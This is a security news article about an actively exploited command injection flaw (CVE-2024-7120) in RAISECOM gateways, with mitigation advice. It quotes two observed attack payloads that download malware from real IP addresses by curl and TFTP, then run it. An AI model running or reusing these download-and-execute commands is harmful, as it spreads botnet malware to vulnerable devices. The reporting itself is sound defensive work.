Critical Flaw in RAISECOM Gateways Actively Exploited, Exposing Thousands to Remote Attacks

by do son · September 25, 2024

Image: Netsecfish

A newly discovered and actively exploited vulnerability in RAISECOM Gateway devices poses a significant threat to enterprise security. The flaw, tracked as CVE-2024-7120 with a critical CVSS score of 9.8, allows remote attackers to execute arbitrary commands on affected devices, potentially leading to unauthorized access, data breaches, and system compromise.

The command injection vulnerability resides within the list_base_config.php script of the web interface, impacting RAISECOM Gateway models MSG1200, MSG2100E, MSG2200, and MSG2300 running software version 3.90. Security researchers have confirmed the ease of exploitation, with proof-of-concept code readily available.

Threat actors are actively leveraging this vulnerability, with attacks observed since early September, peaking around September 12th-13th.

Image: Johannes B. Ullrich

Security expert Johannes B. Ullrich, Ph.D., Dean of Research, has identified two distinct payloads used in the attacks. These payloads, designed to download and execute malware, show evidence of regular botnets scanning for and compromising vulnerable routers.

First payload:

 cd /tmp
rm -rf tplink
curl http://45.202.35.94/tplink --output tplink
chmod 777 tplink
./tplink

Second payload (using TFTP instead of HTTP):

 cd /tmp
tftp -g -r ppc 141.98.11.136 69
chmod 777 ppc
./ppc raisee

While RAISECOM has yet to release a patch, immediate action is crucial to mitigate the risk:

Restrict Access: Limit access to the device’s web interface to trusted networks and authorized personnel only.
Input Validation: Implement stringent input validation and sanitization procedures on the web interface to prevent malicious code injection.
Network Monitoring: Employ robust network monitoring and intrusion detection systems to identify and respond to any suspicious activity.